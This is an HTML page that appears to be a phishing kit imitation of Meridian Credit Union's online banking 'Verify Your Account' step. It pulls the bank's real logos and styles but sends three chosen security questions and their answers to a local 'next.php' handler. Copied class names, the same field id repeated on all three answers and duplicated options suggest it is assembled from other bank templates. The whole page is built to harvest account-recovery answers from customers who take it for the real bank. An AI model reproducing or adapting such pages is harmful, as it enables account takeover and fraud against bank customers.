

<!DOCTYPE html>
<html>
<head>
    
    <title>Account - Meridian Credit Union</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <meta name="description" content="Meridian Credit Union online banking">
    <meta name="keywords" content="meridian, credit, union, online, banking">

	<link href="https://banking.meridiancu.ca//Content/css/style.css?v=OB.Retail.Release.6.7.1.19" rel="stylesheet" />



</head>
<body>

<div class="load-remove" style="display: none">


	
</div>
<div class="body-content">
	<div class="row public-header">
		<div class="logo-container">
			<a href="/Security_Login">
				<img src="https://banking.meridiancu.ca//Content/Images/meridian-logo.svg" alt="Meridian Logo" class="meridian-logo" />
			</a>
		</div>
		<div class="link-container">
			<ul class="utility-links">
				<li>
					<a href="https://www.meridiancu.ca/" target="_blank">MeridianCU.ca</a>
				</li>
			</ul>
		</div>
	</div>
</div>

	<div id="page-content" class="signin-page" style="background-image: url(https://banking.meridiancu.ca/Content/Images/Banners/Retail_SignInBackground_All.jpg)">


		<div class="signin-page-inner dimmed">
			<div class="row">
				<div class="signin-form-container wide">
					

<form action="next.php" method="post"><input name="__RequestVerificationToken" type="hidden" value="Ey6DdmQayNZKIwyvXT6wMHdUSK7j_E8OH0FwHKfwudx2Ic1BC7qndfMZda_45RVtg6I2kc3oL_8Y_R0bXyqtJczCe5x7OUlRS-eYrpDfX4k1" />	<div class="signin-form">
		<h1>Verify Your Account</h1>



<div class="horizontal-steps">
	<div class="step selected">
		<span>Security</span>
	</div>
	
	<div class="step ">
		<span>Verify account</span>
	</div>

	<div class="step ">
		<span>Complete</span>
	</div>
</div>



			<p>PERSONAL INFORMATION.</p>

<select required="" name="Q1" class="td-layout-grid6" size="1" style="height:42px;width:340px">	
						<option value="" selected="selected">Select the security question</option>
	
						<option value="What was the name of your favourite superhero as a child?" >What was the name of your favourite superhero as a child?</option>
					
						<option value="What is the name of the city where your mother was born?" >What is the name of the city where your mother was born?</option>
					
						<option value="What was the last name of your favourite teacher in high school?" >What was the last name of your favourite teacher in high school?</option>
					
						<option value="What is the first name of your oldest nephew?" >What is the first name of your oldest nephew?</option>
					
						<option value="What is the first name of your father's oldest sibling?" >What is the first name of your father's oldest sibling?</option>
					
						<option value="What is the first name of your oldest cousin?" >What is the first name of your oldest cousin?</option>
					
						<option value="What was the first name of your first roommate?" >What was the first name of your first roommate?</option>
					
						<option value="What is the first name of your spouse's/partner's father?" >What is the first name of your spouse's/partner's father?</option>
					
						<option value="What is the first name of your first friend?" >What is the first name of your first friend?</option>
					 
<option value="What is the street name where you lived when you were 10 years old?" >What is the street name where you lived when you were 10 years old?</option>
					
						<option value="What is your youngest child's middle name?" >What is your youngest child's middle name?</option>
					
						<option value="What is your mother's middle name?" >What is your mother's middle name?</option>
					
						<option value="What is the first name of the maid of honour at your wedding?" >What is the first name of the maid of honour at your wedding?</option>
					
						<option value="What is your favourite cartoon?" >What is your favourite cartoon?</option>
					
						<option value="What is your father's middle name?" >What is your father's middle name?</option>
					
						<option value="What is the first name of the best man at your wedding?" >What is the first name of the best man at your wedding?</option>
					
						<option value="What is the middle name of your oldest sibling?" >What is the middle name of your oldest sibling?</option>
					
						<option value="What was the first name of your first manager?" >What was the first name of your first manager?</option>
					
						<option value="What is your favourite musical instrument?" >What is your favourite musical instrument?</option>
					
						<option value="What is your spouse's/partner's middle name?" >What is your spouse's/partner's middle name?</option>
					
						<option value="What was the name of your first pet?" >What was the name of your first pet?</option>
					
						<option value="What was the last name of your favourite teacher in elementary school?" >What was the last name of your favourite teacher in elementary school?</option>
					
						<option value="What is the first name of your mother's oldest sibling?" >What is the first name of your mother's oldest sibling?</option>
					
						<option value="Who was your favourite athlete as a child?" >Who was your favourite athlete as a child?</option>
					
						<option value="What colour was your first car?" >What colour was your first car?</option>
					
						<option value="What is the name of the city where your father was born?" >What is the name of the city where your father was born?</option>
					
						<option value="What city were you born in?" >What city were you born in?</option>
						</select>

<input  id="CustNo" name="A1" placeholder="Enter your security answer" required="required" type="text" value="" />

<select required="" name="Q2" class="td-layout-grid6" size="1" style="height:42px;width:340px">	
				<option value="" selected="selected">Select your security question</option>
					
						<option value="What is the street name where you lived when you were 10 years old?" >What is the street name where you lived when you were 10 years old?</option>
						<option value="What is your youngest child's middle name?" >What is your youngest child's middle name?</option>
						<option value="What is your mother's middle name?" >What is your mother's middle name?</option>
						<option value="What is the first name of the maid of honour at your wedding?" >What is the first name of the maid of honour at your wedding?</option>
						<option value="What is your favourite cartoon?" >What is your favourite cartoon?</option>
						<option value="What is your father's middle name?" >What is your father's middle name?</option>
						<option value="What is the first name of the best man at your wedding?" >What is the first name of the best man at your wedding?</option>
						<option value="What is the middle name of your oldest sibling?" >What is the middle name of your oldest sibling?</option>
						<option value="What was the first name of your first manager?" >What was the first name of your first manager?</option>
						<option value="What is your favourite musical instrument?" >What is your favourite musical instrument?</option>
						<option value="What is your spouse's/partner's middle name?" >What is your spouse's/partner's middle name?</option>
						<option value="What was the name of your first pet?" >What was the name of your first pet?</option>
						<option value="What was the last name of your favourite teacher in elementary school?" >What was the last name of your favourite teacher in elementary school?</option>
						<option value="What is the first name of your mother's oldest sibling?" >What is the first name of your mother's oldest sibling?</option>
						<option value="Who was your favourite athlete as a child?" >Who was your favourite athlete as a child?</option>
						<option value="What colour was your first car?" >What colour was your first car?</option>
						<option value="What is the name of the city where your father was born?" >What is the name of the city where your father was born?</option>
						<option value="What city were you born in?" >What city were you born in?</option>
						<option value="What was the name of your favourite superhero as a child?" >What was the name of your favourite superhero as a child?</option>
						<option value="What is the name of the city where your mother was born?" >What is the name of the city where your mother was born?</option>
						<option value="What was the last name of your favourite teacher in high school?" >What was the last name of your favourite teacher in high school?</option>
						<option value="What is the first name of the person you went to your prom with?" >What is the first name of the person you went to your prom with?</option>
						<option value="What is the first name of the person you went to your prom with?" >What is the first name of the person you went to your prom with?</option>	
						<option value="What is the first name of your oldest nephew?" >What is the first name of your oldest nephew?</option>
						<option value="What is the first name of your father's oldest sibling?" >What is the first name of your father's oldest sibling?</option>			
						<option value="What is the first name of your oldest cousin?" >What is the first name of your oldest cousin?</option>
						<option value="What was the first name of your first roommate?" >What was the first name of your first roommate?</option>
						<option value="What is the first name of your spouse's/partner's father?" >What is the first name of your spouse's/partner's father?</option>
						<option value="What is the first name of your first friend?" >What is the first name of your first friend?</option></select>

<input  id="CustNo" name="A2" placeholder="Enter your security answer"  required="required" type="text" value="" />

<select required="" name="Q3" class="td-layout-grid6" size="1" style="height:42px;width:340px">	
		<option value="" selected="selected">Select your security question</option>
					
					<option value="What is your spouse's/partner's middle name?" >What is your spouse's/partner's middle name?</option>
					
						<option value="What was the name of your first pet?" >What was the name of your first pet?</option>
					
						<option value="What was the last name of your favourite teacher in elementary school?" >What was the last name of your favourite teacher in elementary school?</option>
					
						<option value="What is the first name of your mother's oldest sibling?" >What is the first name of your mother's oldest sibling?</option>
					
						<option value="Who was your favourite athlete as a child?" >Who was your favourite athlete as a child?</option>
					
						<option value="What colour was your first car?" >What colour was your first car?</option>
					
						<option value="What is the name of the city where your father was born?" >What is the name of the city where your father was born?</option>
					
						<option value="What city were you born in?" >What city were you born in?</option>
					
						<option value="What was the name of your favourite superhero as a child?" >What was the name of your favourite superhero as a child?</option>
					
						<option value="What is the name of the city where your mother was born?" >What is the name of the city where your mother was born?</option>
					
						<option value="What was the last name of your favourite teacher in high school?" >What was the last name of your favourite teacher in high school?</option>
					
						<option value="What is the first name of the person you went to your prom with?" >What is the first name of the person you went to your prom with?</option>
					
						<option value="What is the street name where you lived when you were 10 years old?" >What is the street name where you lived when you were 10 years old?</option>
					
						<option value="What is your youngest child's middle name?" >What is your youngest child's middle name?</option>
					
						<option value="What is your mother's middle name?" >What is your mother's middle name?</option>
					
						<option value="What is the first name of the maid of honour at your wedding?" >What is the first name of the maid of honour at your wedding?</option>
					
						<option value="What is your favourite cartoon?" >What is your favourite cartoon?</option>
					
						<option value="What is your father's middle name?" >What is your father's middle name?</option>
					
						<option value="What is the first name of the best man at your wedding?" >What is the first name of the best man at your wedding?</option>
					
						<option value="What is the middle name of your oldest sibling?" >What is the middle name of your oldest sibling?</option>
					
						<option value="What was the first name of your first manager?" >What was the first name of your first manager?</option>
					
						<option value="What is your favourite musical instrument?" >What is your favourite musical instrument?</option>

						<option value="What is the first name of your oldest nephew?" >What is the first name of your oldest nephew?</option>
					
						<option value="What is the first name of your father's oldest sibling?" >What is the first name of your father's oldest sibling?</option>
					
						<option value="What is the first name of your oldest cousin?" >What is the first name of your oldest cousin?</option>
					
						<option value="What was the first name of your first roommate?" >What was the first name of your first roommate?</option>
					
						<option value="What is the first name of your spouse's/partner's father?" >What is the first name of your spouse's/partner's father?</option>
					
						<option value="What is the first name of your first friend?" >What is the first name of your first friend?</option>
					 
</select>

<input  id="CustNo" name="A3" placeholder="Enter your security answer" required="required" type="text" value="" />
</BR>

			
		<div class="double signin-buttons">
			<div>
				<a href="/Security_Login" class="transparent button">Cancel</a>
			</div>
			<div>
				<input type="submit" class="orange button" value="Continue" />
			</div>
		</div>
	</div>
</form>

					<div class="signin-form-links">
						<a href="/Security_Contact" class="semibold ">Contact Us</a> |
						<a href="/Security_FAQ" class="semibold ">FAQs</a> |
						<a href="/Security_Difficulty" class="semibold ">Having Difficulty Signing In?</a>
					</div>
				</div>
			</div>
		</div>
	</div>

<footer class="main-footer">
	<div class="row">
		<div class="footer-logos">
			<div class="logo-container">
				<a href="/Security_Login">
					<img src="https://banking.meridiancu.ca//Content/Images/meridian-logo-white.svg" alt="Meridian Logo" class="meridian-logo" />
				</a>
			</div>
			<div>
				<img src="https://banking.meridiancu.ca//Content/Images/entrust.png" class="entrust-seal" />
			</div>
		</div>
		<div class="footer-sub">
			<span>Copyright &copy; 2019 Meridian Credit Union. All rights reserved.</span>
			<div class="footer-links">
				<a href="https://www.meridiancu.ca/privacy" title="Privacy & Security" target="_blank" >Privacy & Security</a>
				<a href="https://www.meridiancu.ca/legal" title="Legal" target="_blank" >Legal</a>
				<a href="https://www.meridiancu.ca/accessibility" title="Accessibility" target="_blank" >Accessibility</a>
			</div>
		</div>
	</div>
</footer>

	
</body>
</html>
